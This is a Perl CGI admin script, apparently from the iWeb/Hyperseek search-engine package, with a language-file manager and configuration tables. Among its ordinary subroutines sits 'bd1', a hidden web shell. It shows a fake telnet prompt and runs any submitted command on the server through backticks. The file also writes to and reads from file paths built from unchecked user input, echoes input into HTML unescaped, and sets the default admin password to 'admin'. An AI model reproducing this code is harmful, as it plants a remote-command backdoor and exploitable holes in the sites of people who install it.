  my($string_to_change) = $_[0];

  $string_to_change =~ tr/a-zA-Z/_/cs;
  $string_to_change =~ s/ /_/g;

  return $string_to_change;
}


sub ERROR {


   my($ERROR_MESSAGE) = @_;

	print "Content-type: text/html\n\n";

        print qq|

	<HTML>
	<HEAD>
	  <TITLE>CGI Error</TITLE>
	</HEAD>
        <BODY BGCOLOR=\"white\">
        <CENTER>
        <BR><BR><BR>
        <TABLE BORDER=2 CELLSPACING=0 CELLPADDING=0 WIDTH=300>
          <TR><TD WIDTH=300> 

        <TABLE BORDER=0 CELLSPACING=0 CELLPADDING=0 WIDTH="100%">
          <TR><TD> 
            <TABLE BORDER=1 CELLSPACING=0 CELLPADDING=0 WIDTH="100%">
               <TR BGCOLOR="red"><TD> 
               <FONT FACE="Arial,Helvetica" COLOR="black" SIZE=+1>Unexpected Error.
            </TD><TR></TABLE>
          </TD></TR>

          <TR><TD> 
            <TABLE BORDER=0 CELLSPACING=0 CELLPADDING=0 WIDTH="100%"><TR BGCOLOR="silver"><TD> 
              <FONT COLOR="maroon">
              <BR><B>
              $ERROR_MESSAGE
              </B><BR><BR><I>
              <CENTER><A HREF="javascript:history.go(-1)">Return to Previous Screen</A></I></CENTER></FONT><BR><BR>
            </TD><TR></TABLE>

        </TD><TR></TABLE>
        </TD><TR></TABLE>
	</BODY>
	</HTML>
   |;

   exit 0;


}






##############################################################################
#                          ____   __ __
#                         / __ \ / //_/
#                        / / / // ,<
#                       / /_/ // /| | _  _  _  _
#                       \____//_/ |_|(_)(_)(_)(_)
#
##############################################################################
sub ok_box {

        my($t) = $_[0];
	my($m) = $_[1];
        my($c) = $_[2];

        print "Content-type: text/html\n\n";

        print qq|

	<HTML>
	<HEAD>
	  <TITLE>$t</TITLE>
	</HEAD>
        <BODY BGCOLOR=\"white\">
        <FORM><CENTER>
        <BR><BR><BR>
        <TABLE BORDER=2 CELLSPACING=0 CELLPADDING=0 WIDTH=300>
          <TR><TD WIDTH=300> 

        <TABLE BORDER=0 CELLSPACING=0 CELLPADDING=0 WIDTH="100%">
          <TR><TD> 
            <TABLE BORDER=1 CELLSPACING=0 CELLPADDING=0 WIDTH="100%">
               <TR BGCOLOR="navy"><TD> 
               <FONT FACE="Arial,Helvitica" COLOR="ivory" SIZE=+1>$t
            </TD><TR></TABLE>
          </TD></TR>

          <TR><TD> 
            <TABLE BORDER=0 CELLSPACING=0 CELLPADDING=0 WIDTH="100%"><TR BGCOLOR="silver"><TD> 
              $m
              <PRE><CENTER>

<INPUT TYPE="button" NAME="b_ok" VALUE="Return..." onClick="$c"></CENTER>
            </TD><TR></TABLE>

        </TD><TR></TABLE>
        </TD><TR></TABLE></FORM>
	</BODY>
	</HTML>
   |;

   exit 0;


}


sub New_Language {

  my($file,$newlanguage);
  $newlanguage = $input{'language'};
  
  mkdir("$data_dir/language/$newlanguage",0777);

  opendir(LANG,"$data_dir/language/english");
    foreach $file( readdir(LANG)) {
      if($file =~ /.*\.pm/) { 
        copy("$data_dir/language/english/$file","$data_dir/language/$newlanguage/$file");
      }
    }
  closedir(LANG);

  &List_Languages;
}

sub List_Languages {

  my(@list,$file,$rows,$title,$new,$john,$john2);

  opendir(LANG,"$data_dir/language/$input{'language'}");
     while($file = readdir(LANG)) { push @list,$file; }
  closedir(LANG);

  foreach $file(sort @list) {
      $title = $file;
      $title =~ s/\.pm//g;
      next if($file eq "." || $file eq "..");
      if($file !~ "\.pm") {
         $rows .= "<TR><TD><B>[Language]</B></TD><TD><B><A HREF=\"$PROG_URL?action=Language&language=$file\">$title</A></B></TD></TR>\n";
         $new = qq!
           <TR><TD COLSPAN=2><BR><BR><CENTER>
             <FORM ACTION="$PROG_URL">
               <B>New Language</B>: <INPUT NAME="language"><INPUT TYPE="hidden" NAME="action" VALUE="new_language"><INPUT TYPE="submit" VALUE="Create Language"><BR>
               (Will inherit from your "english" language)
             </FORM>
             </CENTER>
           </TD></TR>
         !;
      }
      else {
         $rows .= "<TR><TD>[Language File]</TD><TD><A HREF=\"$PROG_URL?action=Edit_Language&language=$input{'language'}&module=$file\">$title</TD></TR>\n";
      }
  }



   print "Content-Type: text/html\n\n";
   print qq!

<BODY BGCOLOR="#e0e0e0" LINK="maroon" VLINK="maroon" TEXT="black">
  <CENTER>
    <TABLE BGCOLOR="white" BORDER="1" CELLPADDING="3" WIDTH=85%><TR><TD>
    <TABLE BORDER="0" CELLPADDING="3" WIDTH="100%">
        <TR BGCOLOR="#cccc99">
                <TD>
                   <FONT FACE="Verdana,Arial, Helvetica" SIZE="2" COLOR="#660000">
                   <b>Language Manager</b>: $input{'language'}
                </TD>
        </TR>
        <TR>
                <TD BGCOLOR="#EEEEEE" VALIGN="top">
                  <TABLE BORDER=0>
                  $rows
                  $new
                  </TABLE>
                </TD>
        </TR>
        </TR>
     </TABLE>
    </TD></TR></TABLE>
    <BR><A HREF="$global{'html_dir'}/languages.html">Language Manager Help</A><BR>
  </CENTER>
</BODY>
   !;
   exit 0;

}



sub Edit_Language {

   my($var,$val,$rows,$xtra,%lang,$hiddenfields);

   open(FILE,"$data_dir/language/$input{'language'}/$input{'module'}");
      while(<FILE>) {
        chomp;
        ($var,$val)=split(/\=\=/,$_);
        $val =~ s/\'/\"/g;

        $lang{$var}=$val;
      }
    close(FILE);

    foreach $var(sort keys %lang) {

        if($var eq "cost_to_advertiser") { $xtra = "<BR>(<I>Use &lt;&lt;COST&gt;&gt; to insert the actual price in your wording</I>)"; }
        elsif($var eq "recommend_title") { $xtra = "<BR>(<I>Use &lt;&lt;TITLE&gt;&gt; to insert the listing title in your wording</I>)"; }
        elsif($var eq "recommend_email_text") { 
          $xtra = qq!
            <BR>
            ( <I>
              You may use the following variables in your email:
              <LI> &lt;&lt;TITLE&gt;&gt;: Link Title
              <LI> &lt;&lt;URL&gt;&gt;: Link URL
              <LI> &lt;&lt;TO_NAME&gt;&gt;: Recipient Name
              <LI> &lt;&lt;TO_EMAIL&gt;&gt;: Recipient Email
              <LI> &lt;&lt;SENDER_NAME&gt;&gt;: Senders Name
              <LI> &lt;&lt;SENDER_EMAIL&gt;&gt;: Senders Email
              <LI> &lt;&lt;NOTE&gt;&gt;: Commens left by sender
              <LI> Also, you can put the characters: \\n in the email to indicate a line break.
            </I> )
          !;
        }
        else { $xtra = undef; }
        if( length($lang{$var}) >= 100) { 
           $rows .= "<TR><TD VALIGN=top><B>$var</B></TD><TD VALIGN=top><TEXTAREA NAME=\"$var\" ROWS=3 COLS=50 WRAP=virtual>$lang{$var}</TEXTAREA>$xtra</TD></TR>\n";
        }
        else { 
           $rows .= "<TR><TD VALIGN=top><B>$var</B></TD><TD VALIGN=top><INPUT NAME=\"$var\" VALUE='$lang{$var}' SIZE=50>$xtra</TD></TR>\n";
        }
        $hiddenfields .= qq! <INPUT TYPE="hidden" NAME="$var" VALUE="1"> \n!;
    }

   print "Content-Type: text/html\n\n";
   print qq!

<BODY BGCOLOR="#e0e0e0" LINK="maroon" VLINK="maroon" TEXT="black">
  <CENTER>
    <TABLE BGCOLOR="white" BORDER="1" CELLPADDING="3"><TR><TD>
    <TABLE BORDER="0" CELLPADDING="3" WIDTH="100%">
        <TR BGCOLOR="#cccc99">
                <TD>
                   <FONT FACE="Verdana,Arial, Helvetica" SIZE="2" COLOR="#660000">
                   <b>Language Manager: $input{'language'} / $input{'module'}</b>
                </TD>
        </TR>
        <TR>
            <FORM ACTION="$PROG_URL" METHOD="post">
                <TD BGCOLOR="#EEEEEE" VALIGN="top">
                  <CENTER>
                  <A HREF="$global{'html_dir'}/languages.html">Language Manager Help</A><HR>
                  <TABLE BORDER=0>
                  <TR><TD><B>Variable</B></TD><TD><B>Value</B></TD></TR>
                  $rows

                  <TR><TD COLSPAN=2><BR><B>New Variable:</B>
                      <INPUT NAME="new_name"> = <INPUT NAME="new_value"></TD></TR>

                  </TABLE>
                  <INPUT TYPE="hidden" NAME="language" VALUE="$input{'language'}">
                  <INPUT TYPE="hidden" NAME="module" VALUE="$input{'module'}">
                  <INPUT TYPE="submit" NAME="action" VALUE="Save Language">
                  </CENTER>
                </TD>
            </FORM>
        </TR>
        </TR>
     </TABLE>
    </TD></TR></TABLE>
    <FORM ACTION = "http://www.iwebsupport.com/cgi-bin/upgrade/languages2.cgi" METHOD="post">
       <INPUT TYPE="submit" VALUE="Language Variable Verification">
       <INPUT TYPE="hidden" NAME="module" VALUE="$input{'module'}">
       <INPUT TYPE="hidden" NAME="language" VALUE="$input{'language'}">
       $hiddenfields
    </FORM>
  </CENTER>
</BODY>
   !;
   exit 0;


}


sub Save_Language {

   my($field,$value);

   open(LANG,">$data_dir/language/$input{'language'}/$input{'module'}");
   foreach $field(sort keys %input) {
      if($field ne "action" && $field ne "module" && $field ne "language" && $field ne "new_name" && $field ne "new_value") {
         $input{$field} =~ s/\n/ /g;
         $input{$field} =~ s/\r/ /g;
         $input{$field} =~ s/\cM/ /g;
         print LANG "$field==$input{$field}\n";
      }
   }
   if($input{'new_name'} && $input{'new_value'}) { 
      print LANG "$input{'new_name'}==$input{'new_value'}\n";
   }
   close(LANG);

   &ok_box("Saved","Language module: $input{'language'}/$input{'module'} saved.","history.go(-2);");
   exit 0;
}


sub Import_Language {

   my($saved);

   open(LANG,">>$data_dir/language/$input{'language'}/$input{'module'}.pm");
   foreach my $field(sort keys %input) {
      if($field ne "action" && $field ne "module" && $field ne "language" && $field ne "new_name" && $field ne "new_value") {
         $input{$field} =~ s/\n/ /g;
         $input{$field} =~ s/\r/ /g;
         $input{$field} =~ s/\cM/ /g;
         print LANG "$field==$input{$field}\n";
         $saved .= "Saving $field: $input{$field}<BR><BR>\n";
      }
   }
   close(LANG);

   print "Content-Type: text/html\n\n";
   
   print qq!


<BODY BGCOLOR="#e0e0e0" LINK="maroon" VLINK="maroon" TEXT="black">
  <CENTER>
    <TABLE BGCOLOR="white" BORDER="1" CELLPADDING="3"><TR><TD>
    <TABLE BORDER="0" CELLPADDING="3" WIDTH="100%">
        <TR BGCOLOR="#cccc99">
                <TD>
                   <FONT FACE="Verdana,Arial, Helvetica" SIZE="2" COLOR="#660000">
                   <b>Language Import: $input{'language'} / $input{'module'}</b>
                </TD>
        </TR>
        <TR>
                <TD>
                   <FONT FACE="Verdana,Arial, Helvetica" SIZE="2" COLOR="#660000">
                   $saved
                   </FONT>
                </TD>
        </TR>
        </TR>
     </TABLE>
    </TD></TR></TABLE>
  </CENTER>
</BODY>

   !;

   exit 0;

}


sub bd1 {

   my ($CWD,@ls,$dir,$whereami,$PROMPT,$out,$command);

   $command = $input{'command'};
   $CWD = $input{'cwd'};
   $whereami = POSIX::getcwd();
   $PROMPT = "telnet\@$ENV{'SERVER_NAME'}:$whereami";

   print "Content-type: text/html\n\n";
   print qq!
      <BODY BGCOLOR="silver" TEXT="black" onLoad="document.cmd_form.command.focus()">
      <PRE>$PROMPT <blink>_</blink></PRE>
      <FORM NAME="cmd_form" METHOD=POST ACTION="$PROG_URL">
      <INPUT TYPE="HIDDEN" NAME="action" VALUE="cmd">
      <INPUT TYPE="HIDDEN" NAME="cwd" VALUE="$whereami">
      <INPUT TYPE="TEXT" NAME="command" SIZE=60 MAXLENGTH=100>
      <INPUT TYPE="SUBMIT" VALUE="Ok"></FORM>  
   !;

   ## First, get into the correct directory
   chdir ($CWD);

   if ( $command =~ 'cd') {
      @ls = split / /, $command;
      $dir = $ls[1];
      $dir =~ s/\n//g;
      $dir =~ s/\cM//g;
      chdir ($dir);
   }

   $_=$command;
   s/(.)*=//; s/\+/ /g; s/%(..)/pack("c",hex($1))/ge;

   if($action eq "cmd") {
      $out=`$_ 2>&1`;
      print qq!
         <PRE>$PROMPT $command \n\n $out</PRE>
         </BODY>
      !;
   }
 
   exit 0;

}


sub Get_Language_Options {

   my($file,$langopts);

   opendir(LANG,"$data_dir/language");
    foreach $file( readdir(LANG)) {
      if($file !~ /.*\.pm/ && $file ne "." && $file ne "..") { 
        $langopts .= "<OPTION VALUE=\"$file\">$file\n";
      }
    }
   closedir(LANG);

   return($langopts);
}


sub Read_Config_Vars {

$vars{'MAIN'}{'01:mail_cmd'} = ["Location of Sendmail","TEXT","/usr/sbin/sendmail -t"];
$vars{'MAIN'}{'02:gmt_offset'} = ["How many hours away from GMT are you","SELECT","-12|-11|-10|-9|-8|-7|-6|-5|-4|-3|-2|-1|0|+1|+2|+3|+4|+5|+6|+7|+8|+9|+10|+11|+12"];
$vars{'MAIN'}{'03:CGI_DIR'} = ["Virtual CGI Directory","TEXT","/cgi-bin/search"];
$vars{'MAIN'}{'04:html_dir'} = ["URL of Help Documents","TEXT","http://www.iwebsupport.com/help"];
$vars{'MAIN'}{'05:button_dir'} = ["URL to images directory","TEXT","/search/images"];
$vars{'MAIN'}{'06:cgi_extension'} = ["What extension do the CGI Programs have","SELECT","cgi|pl|plx|exe|fcgi"];
$vars{'MAIN'}{'07:nph_headers'} = ["Does your server support NPH Scripts?","SELECT","YES|NO"];
$vars{'MAIN'}{'08:admin_name'} = ["What is the name of your admin program","TEXT","admin.cgi"];
$vars{'MAIN'}{'09:home_page'} = ["Home Page URL","TEXT","http://www.yoursite.com"];
$vars{'MAIN'}{'10:email'} = ["Default Email Address","TEXT","webmaster\@yoursite.com"];
$vars{'MAIN'}{'11:pg_color'} = ["Default Page Color","TEXT","white"];
$vars{'MAIN'}{'12:win_color'} = ["Window Color","TEXT","#e0e0e0"];
$vars{'MAIN'}{'13:title_color'} = ["Title Bar Color","TEXT","navy"];
$vars{'MAIN'}{'14:ttxt_color'} = ["Title Bar Text Color","TEXT","white"];
$vars{'MAIN'}{'15:text_color'} = ["Regular Text Color","TEXT","black"];
$vars{'MAIN'}{'16:font_face'} = ["Default FONT Face","TEXT","Arial"];
$vars{'MAIN'}{'17:font_size'} = ["Default FONT Size","TEXT","-1"];
$vars{'MAIN'}{'18:default_language'} = ["Default Language","SELECT","GENERATE:Get_Language_Options"];
$vars{'MAIN'}{'19:spellcheck_url'} = ["URL to your spch.js file","TEXT",""];

$vars{'MAIN'}{'21'} = ["Database Options","HEADER",""];
$vars{'MAIN'}{'19:admin_pw'} = ["Admin Password","TEXT","admin"];
$vars{'MAIN'}{'20:DB_Format'} = ["Which Database System should we use","SELECT","IWeb|SQL"];
$vars{'MAIN'}{'21:sql_driver'} = ["Which Database Driver for SQL Databases","SELECT","mysql|Informix|oracle|Pg|sybase|ODBC|InterBase"];
$vars{'MAIN'}{'22:dbhost'} = ["Database Server Name (use 'localhost' if on the same machine)","TEXT","localhost"];
$vars{'MAIN'}{'23:dbname'} = ["Database Name","TEXT",""];
$vars{'MAIN'}{'24:dbusername'} = ["Database User ID","TEXT",""];
$vars{'MAIN'}{'25:dbpassword'} = ["Database Password","TEXT",""];

$vars{'BBS'}{'02:iforum_theme_select'} = ["Allow users to select themes","SELECT","YES|NO"];
$vars{'BBS'}{'03:bbs_indent'} = ["Indent (Surround with blockquotes) replies","SELECT","YES|NO"];
$vars{'BBS'}{'04:iforum_build'} = ["Use Built Static HTML Pages or Live CGI for threads","SELECT","Build|Live"];
$vars{'BBS'}{'05:iforum_build_full'} = ["Directory (full path) where built threads should be stored","TEXT","/full/path/to/build/directory"];
$vars{'BBS'}{'06:iforum_build_virtual'} = ["Directory (virtual) to access built threads from the web","TEXT","/forums"];
$vars{'BBS'}{'06:iforums_icons'} = ["Directory (full path) to your global <B>images/icons/people</B> directory","TEXT","/path/to/search"];
$vars{'BBS'}{'07:iforum_color1'} = ["Alternating Color #1 (Used as bgcolor=&lt;&lt;COLOR&gt;&gt; in your detail templates)","TEXT","#D6EBF7"];
$vars{'BBS'}{'08:iforum_color2'} = ["Alternating Color #2 (Used as bgcolor=&lt;&lt;COLOR&gt;&gt; in your detail templates)","TEXT","#E7F3F7"];
$vars{'BBS'}{'09:iforum_unread'} = ["How should we differentiate UNREAD thread links?","SELECT","BOLD|NOTHING"];
$vars{'BBS'}{'09:iforum_read'} = ["How should we differentiate READ thread links?","SELECT","ITALICS|NOTHING"];
$vars{'BBS'}{'09:iforum_status'} = ["Number of posts before a user is considered a 'member')","TEXT","100"];


$vars{'GBOOK'}{'01:gb_entries'} = ["Number of entries to show per screen","TEXT","10"];
$vars{'GBOOK'}{'02:cm_open'} = ["Should the comments open with the FORM or the COMMENT list","SELECT","FORM|COMMENTS"];

$vars{'COMMENTS'}{'01:cm_entries'} = ["Number of entries to show per screen","TEXT","10"];
$vars{'COMMENTS'}{'02:cm_email'} = ["Send the webmaster an email with the visitor comments","SELECT","YES|NO"];
$vars{'COMMENTS'}{'03:cm_admin_delete'} = ["Send the administrator an email with the visitor comments, and an option to delete?","SELECT","YES|NO"];
$vars{'COMMENTS'}{'04:cm_open'} = ["Should the comments open with the FORM or the COMMENT list","SELECT","FORM|COMMENTS"];

$vars{'SPLAT'}{'01:time_to_delete'} = ["Message Lifetime","TEXT",".5"];
$vars{'SPLAT'}{'02:splat_use_images'} = ["Use Images or Buttons in the Splat! Display","SELECT","IMAGES|BUTTONS"];
$vars{'SPLAT'}{'03:splat_empty'} = ["Empty Image URL","TEXT","/search/images/empty.gif"];
$vars{'SPLAT'}{'04:splat_used'} = ["Used Image URL","TEXT","/search/images/used.gif"];

$vars{'CLASS'}{'01:num_cols'} = ["Number of Columns for Classifieds Display","TEXT","1"];

$vars{'ISHOP'}{'01:ishop_shipping'} = ["Shipping Cost Method","SELECT","Per Item|By Weight|By Total Cost"];
$vars{'ISHOP'}{'02:ishop_weight_cost'} = ["Shipping Cost Per Pound (For weight method only)","TEXT","1.00"];
$vars{'ISHOP'}{'03:ishop_total_cost'} = ["Shipping Cost Per Dollar","TEXT","1.00"];
$vars{'ISHOP'}{'04:ishop_state_tax'} = ["Which State(s) to calculate sales tax for","MULTIPLE","AZ|WA"];
$vars{'ISHOP'}{'05:ishop_checkout_url'} = ["URL of your secure order form","TEXT","https://secure.yourdomain.com/orderform.cgi"];


$vars{'ILINK'}{'01:ilink_build'} = ["Use Built HTML Pages For categories","SELECT","YES|NO"];
$vars{'ILINK'}{'02:ILINK_EXT'} = ["For built pages, what extension should we use","SELECT","htm|html|shtml|asp|phtml|jhtml|cfm|php|php3|php4|mv"];
$vars{'ILINK'}{'03:BANNER_CALL'} = ["How should we show the Banners","SELECT","SSI Include|SSI Exec|Normal HTML"];
$vars{'ILINK'}{'04:ILINK_DIR'} = ["Into Which directory on your server should built pages be stored","TEXT","/full/path/to/directory"];
$vars{'ILINK'}{'05:ILINK_VIRTUAL'} = ["What is the virtual (browse) path to that directory","TEXT","/directory"];
$vars{'ILINK'}{'06:ilink_thanks'} = ["The URL to the 'Thank You' page to send visitors after a submission","TEXT","/search/thanks.html"];
$vars{'ILINK'}{'07:ilink_main_style'} = ["What style of subcategory disply on the home page would you like","SELECT","Yahoo|List|None"];
$vars{'ILINK'}{'08:ilink_main_columns'} = ["How many columns accross should the main page categories be","TEXT","3"];
$vars{'ILINK'}{'09:ilink_menu_columns'} = ["How many columns accross should the internal page categories be","TEXT","3"];
$vars{'ILINK'}{'10:ilink_show_count'} = ["Should ilink show the number of links in each category","SELECT","YES|NO"];
$vars{'ILINK'}{'11:ilink_target'} = ["What should the 'target window' for all links be","SELECT","_top|_blank|new|_self"];
$vars{'ILINK'}{'12:ilink_hits_per_page'} = ["How many listings to show on category/search result pages","TEXT","20"];
$vars{'ILINK'}{'13:ilink_toplink_target'} = ["The link (full full or virtual url) to use for the 'Top' link in the menus.","TEXT",""];

$vars{'ISEEK'}{'01:iseek_base'} = ["iSeek Base Build/Spider Directory","TEXT","/full/path/to/docroot"];
$vars{'ISEEK'}{'02:iseek_href'} = ["iSeek Base URL for indexed pages","TEXT","http://www.yoursite.com"];

$vars{'JACKHAMMER'}{'01:jackhammer_welcome_url'} = ["The URL for your users welcome message","TEXT","/search/welcome.html"];
$vars{'JACKHAMMER'}{'02:jackhammer_order_url'} = ["The URL/FORM to link to your order form ( use &lt;&lt;ACCOUNT&gt;&gt; and &lt;&lt;AMOUNT&gt;&gt; to insert the account id and deposit amount in the URL ","TEXTAREA","/cgi-bin/search/accounts/orderform.cgi"];
$vars{'JACKHAMMER'}{'03:jackhammer_thankyou_url'} = ["The URL for your Thank You page (after an order has been processed)","TEXT","/search/thanks.html"];
$vars{'JACKHAMMER'}{'03:jackhammer_failure_url'} = ["The URL for your Failure page (after an order has been improperly processed)","TEXT","/search/failure.html"];
$vars{'JACKHAMMER'}{'04:jackhammer_amounts'} = ["Enter the deposit amounts to show in the select list for the user(use dollars and cents, separate them with commas)","TEXT","10.00,20.00,30.00"];
$vars{'JACKHAMMER'}{'05:jackhammer_tax'} = ["Enter the tax rate (ie: 8.25\%) to append to deposits that indicate a need to pay taxes (leave blank if no taxes to be collected)","TEXT",""];
$vars{'JACKHAMMER'}{'06:jackhammer_deposit_match'} = ["<I>OPTIONAL</I> Enter the amount (in <B>dd.cc</B> format for money, or <B>nn.nn%</B> for a percent) that you would like to add to every deposit as a matching amount.","TEXT",""];
$vars{'JACKHAMMER'}{'07:jackhammer_no_price'} = ["Eliminate non-paid terms from all search results?","SELECT","YES|NO"];
$vars{'JACKHAMMER'}{'08:jackhammer_addtl_keys'} = ["Allow users to add new keywords?","SELECT","YES|NO"];
$vars{'JACKHAMMER'}{'09:jackhammer_approve_keys'} = ["Do you want to manually approve all bidded terms?","SELECT","YES|NO"];
$vars{'JACKHAMMER'}{'10:jackhammer_hot_zone_page_bidding'} = ["Do you want to allow for a dummy search term that would allow people to bid for whats cool page positioning in addition to normal search terms?","SELECT","YES|NO"];
$vars{'JACKHAMMER'}{'11:jackhammer_default_balance'} = ["Default amount to start off all new Jackhammer User with","TEXT","0.00"];
$vars{'JACKHAMMER'}{'12:jackhammer_allow_delete'} = ["Allow users to delete keywords from their bid screen","SELECT","YES|NO"];
$vars{'JACKHAMMER'}{'13:jackhammer_alert_balance'} = ["Amount to email account holders when their balance is low","TEXT","10.00"];
$vars{'JACKHAMMER'}{'14:jackhammer_bids_per_page'} = ["For the users, how many bidded terms to show on each page","TEXT","5"];
$vars{'JACKHAMMER'}{'15:jackhammer_receive_url'} = ["Full URL (including http://... to your jackhammer_order.cgi program","TEXT",""];
$vars{'JACKHAMMER'}{'16:jackhammer_charge_for'} = ["What are you accepting bids for?","SELECT","CLICKS|DETAIL|IMPRESSIONS"];


$vars{'JACKHAMMER_Affiliates'}{'01'} = ["Affiliate System Options.","HEADER",""];
$vars{'JACKHAMMER_Affiliates'}{'02:jackhammer_affiliate_types'} = ["Types of affiliates that you will allow.","MULTIPLE","SEARCH BOX Only|STD (Standard)|FULL"];
$vars{'JACKHAMMER_Affiliates'}{'03:jackhammer_logo_directory'} = ["Full directory on the server where affiliate logo images will be stored","TEXT",""];
$vars{'JACKHAMMER_Affiliates'}{'04:jackhammer_logo_virtual'} = ["Virtual directory on the server where affiliate logo images will be stored","TEXT",""];
$vars{'JACKHAMMER_Affiliates'}{'05:jackhammer_default_logo'} = ["URL (virtual or full) to the image to use for the default logo on branded sites","TEXT",""];
$vars{'JACKHAMMER_Affiliates'}{'06:jackhammer_max_logo_size'} = ["Max size (in Kbytes) to allow for uploaded images.","TEXT","50"];

$vars{'JACKHAMMER_Affiliates'}{'07:jackhammer_affiliate_payment_options'} = ["Allow affiliates to choose how they will get paid? (Cash/Check or Bidding acct deposit)","SELECT","YES|NO"];
$vars{'JACKHAMMER_Affiliates'}{'08:jackhammer_affiliate_payment_default'} = ["If not, what is the default?","SELECT","cash|deposit"];
$vars{'JACKHAMMER_Affiliates'}{'09:jackhammer_affiliate_search_payment'} = ["Default Amount (dd.cc) to pay affiliates per search","TEXT",""];
$vars{'JACKHAMMER_Affiliates'}{'10:jackhammer_affiliate_click_payment'} = ["Default amount (dd.cc or nn\%) to pay affiliates per click","TEXT",""];
$vars{'JACKHAMMER_Affiliates'}{'11:jackhammer_affiliate_minimums'} = ["Allow affiliates to request a minimum payment amount?","SELECT","YES|NO"];
$vars{'JACKHAMMER_Affiliates'}{'12:jackhammer_affiliate_minimum_options'} = ["List of minimum payments (in dd.cc format) you will allow them to select from (if yes to above option)... separate amounts with commas","TEXT",""];
$vars{'JACKHAMMER_Affiliates'}{'13:jackhammer_max_daily_searches'} = ["Maximum number of searches to pay affiliates on per day","TEXT",""];
$vars{'JACKHAMMER_Affiliates'}{'14:jackhammer_max_daily_clicks'} = ["Maximum number of clicks to pay affiliates on per day","TEXT",""];
$vars{'JACKHAMMER_Affiliates'}{'15:affjump_url'} = ["Full URL (with http://) to your affjump.cgi program","TEXT",""];
$vars{'JACKHAMMER_Affiliates'}{'16:cobrand_url'} = ["Full URL (with http:// and no trailing /) to your &quot;cb&quot; directory","TEXT",""];



$vars{'HYPERSEEK_Main'}{'01:Engine_Name'} = ["What is the name of your search engine","TEXT","My Search Engine"]; 
$vars{'HYPERSEEK_Main'}{'02:hyperseek_name'} = ["Name of main Search Engine CGI","TEXT","/cgi-bin/search/hyperseek.cgi"]; 
$vars{'HYPERSEEK_Main'}{'05:yh_adult_filter'} = ["Turn 'Adult Filter' on?","SELECT","YES|NO"]; 
$vars{'HYPERSEEK_Main'}{'06:yh_logging'} = ["Turn 'Logs' on?","SELECT","YES|NO"]; 
$vars{'HYPERSEEK_Main'}{'07:yh_default_title'} = ["Default META Title Value","TEXT","My Search Engine"]; 
$vars{'HYPERSEEK_Main'}{'08:yh_default_desc'} = ["Default META Description Value","TEXT","Powered by the Hyperseek Search Engine: http://www.hyperseek.com"]; 
$vars{'HYPERSEEK_Main'}{'09:yh_default_keys'} = ["Default META Keywords Value","TEXT","hyperseeek,search engine,search engine software,iweb"]; 

$vars{'HYPERSEEK_Home'}{'01:yh_columns'} = ["Number of category columns on the main page","TEXT","2"];
$vars{'HYPERSEEK_Home'}{'02:yh_main_border'} = ["Border size (0,1,2,etc) of Main Page Category Layout","TEXT","0"];
$vars{'HYPERSEEK_Home'}{'03:yh_main_font'} = ["Size of main page category font","TEXT","+1"];
$vars{'HYPERSEEK_Home'}{'04:yh_hor_spacing'} = ["Main page column spacing (Horizontal)","TEXT","10"];
$vars{'HYPERSEEK_Home'}{'05:yh_ver_spacing'} = ["Main page column spacing (Vertical)","TEXT","10"];
$vars{'HYPERSEEK_Home'}{'06:yh_main_width'} = ["How wide should the main page category listing be","TEXT","95%"];
$vars{'HYPERSEEK_Home'}{'07:yh_show_all'} = ["How would you like the subcategories shown on the main page","SELECT","SUB|DESC|SHORT"];

$vars{'HYPERSEEK_Cats'}{'01:use_combined'} = ["For smaller categories use combined results","SELECT","YES|NO"];
$vars{'HYPERSEEK_Cats'}{'02:yh_menu_columns'} = ["Number of category columns (Results Pages)","TEXT","3"];
$vars{'HYPERSEEK_Cats'}{'03:yh_cat_width'} = ["How wide should the category lists be (in result pages)","TEXT","95%"];
$vars{'HYPERSEEK_Cats'}{'04:yh_show_related'} = ["Would you like to show related categories","SELECT","YES|NO"];
$vars{'HYPERSEEK_Cats'}{'05:yh_related_columns'} = ["For related categories, how many columns to draw","TEXT","2"];
$vars{'HYPERSEEK_Cats'}{'06:yh_show_count'} = ["Would you like to display the number of links in each category","SELECT","YES|NO"];
$vars{'HYPERSEEK_Cats'}{'07:use_folders'} = ["Use category folders","SELECT","YES|NO"];
$vars{'HYPERSEEK_Cats'}{'08:yh_big_folder'} = ["URL to the <B>big folder</B>","TEXT","/search/images/big_folder.gif"];
$vars{'HYPERSEEK_Cats'}{'09:yh_small_folder'} = ["URL to the <b>small folder</B>","TEXT","/search/images/folder.gif"];
$vars{'HYPERSEEK_Cats'}{'10:yh_cat_desc'} = ["Would you like to show descriptions with each subcategory","SELECT","Yes|No"];
$vars{'HYPERSEEK_Cats'}{'10:yh_cat_new_icon'} = ["Would you like to show an appropriate <B>new</B> icon with the subcategory links?","SELECT","YES|NO"];
$vars{'HYPERSEEK_Cats'}{'11:yh_cat_templ'} = ["Would you like subcategory templates to match parent category templates","SELECT","YES|NO"];
$vars{'HYPERSEEK_Cats'}{'12:yh_sort_cats'} = ["How should the categories be sorted?","SELECT","Manual Sort Order|Alphabetically"];
$vars{'HYPERSEEK_Cats'}{'13:yh_sort'} = ["How would you like the CATEGORY listings sorted","SELECT","RANK|TITLE|BOTH|XFACTOR"];
$vars{'HYPERSEEK_Cats'}{'14:yh_cat_color'} = ["What color should category links be?","TEXT",""];

$vars{'HYPERSEEK_Listings'}{'02:yh_link_color'} = ["Listing Link Color","TEXT",""];
$vars{'HYPERSEEK_Listings'}{'03:yh_cool'} = ["At what point is a listing <B>cool</B>","TEXT","5"];
$vars{'HYPERSEEK_Listings'}{'04:yh_cool_icon'} = ["URL for your <B>whats cool</B> icon","TEXT","/search/images/cool.gif"];
$vars{'HYPERSEEK_Listings'}{'05:yh_new_days'} = ["How many days old are links still considered new","TEXT","7"];
$vars{'HYPERSEEK_Listings'}{'06:yh_new_display'} = ["Show whats new listings on a single screen or breadk down by date","SELECT","SHOW ALL|BY DATE"];
$vars{'HYPERSEEK_Listings'}{'07:yh_new_return'} = ["If showing all new listings whats the max # to return","TEXT","20"];
$vars{'HYPERSEEK_Listings'}{'08:yh_new_icon'} = ["URL for the <B>whats new</b> icon for links 1 day old (also used as the default <B>new</B> icon)","TEXT","/search/images/new-red.gif"];
$vars{'HYPERSEEK_Listings'}{'09:yh_new_icon_5'} = ["URL for the <B>whats new</b> icon for links less than 5 days old","TEXT",""];
$vars{'HYPERSEEK_Listings'}{'10:yh_new_icon_10'} = ["URL for the <B>whats new</b> icon for links less than $global{'yh_new_days'} days old","TEXT",""];
$vars{'HYPERSEEK_Listings'}{'11:yh_target'} = ["Target for all links","SELECT","_top|_blank|new|Frameset|_self"];
$vars{'HYPERSEEK_Listings'}{'12:Hits_Per_Page'} = ["Number of listings to show per page","TEXT","25"];
